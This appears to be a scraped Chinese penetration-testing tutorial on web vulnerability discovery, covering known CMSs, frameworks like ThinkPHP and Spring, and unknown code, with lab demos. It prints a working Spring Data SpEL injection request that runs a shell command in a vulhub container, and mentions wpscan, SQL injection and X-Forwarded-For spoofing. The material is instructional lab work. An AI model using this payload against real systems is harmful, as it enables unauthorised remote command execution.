漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复

漏洞发现-WEB 应用之漏洞探针类型利用修复
漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

已知 CMS 如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的
是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用
白盒代码审计自行挖掘。
开发框架 如常见的 thinkphp,spring,flask 等开发的源码程序,这种源码程序正常的安全测试思路:先获取对
应的开发框架信息(名字,版本),通过公开的框架类安全问题进行测试,如不存在可采用白盒代码审
计自行挖掘。
php:thinkphp
java:spring
python:flask
未知 CMS 如常见的企业或个人内部程序源码,也可以是某 CMS 二次开发的源码结构,针对此类的源码程序测
试思路:能识别二次开发就按已知 CMS 思路进行,不能确定二次开发的话可以采用常规综合类扫描
工具或脚本进行探针,也可以采用人工探针(功能点,参数,盲猜),同样在有源码的情况下也可以
进行代码审计自行挖掘。
演示案例: 开发框架类源码渗透测试报告-资讯-thinkphp,spring thinkphpscan
漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

vulhub spring Date
spring Date
漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

在注册的时候抓包,并修改成如下数据包:

POST /users?page=&size=5 HTTP/1.1 Host: localhost:8080 Connection: keep-alive Content-Length: 124 Pragma: no-cache Cache-Control: no-cache Origin: http://localhost:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,*/*; q=0.8 Referer: http://localhost:8080/users?page=0&size=5 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh; q=0.9,en; q=0.8username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

执行docker-compose exec spring bash进入容器中,ls查看当前有什么文件或者目录漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

放行数据包,可见成功创建/tmp/success,说明命令执行成功
漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

已知 CMS 非框架类渗透测试报告-工具脚本-wordpress wordpress 是一个适用于博客到大型网站的 CMS (内容管理系统)
墨者靶场
wpscan-kali自带
wpscan-url “”
漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

存在sql注入漏洞
漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

已知 CMS 非框架类渗透测试报告-代码审计-qqyewu_php 漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

【漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复】x-forworded-for 伪造
审计到sql注入
漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

漏洞发现|漏洞发现-WEB 应用之漏洞探针类型利用修复
文章图片

    推荐阅读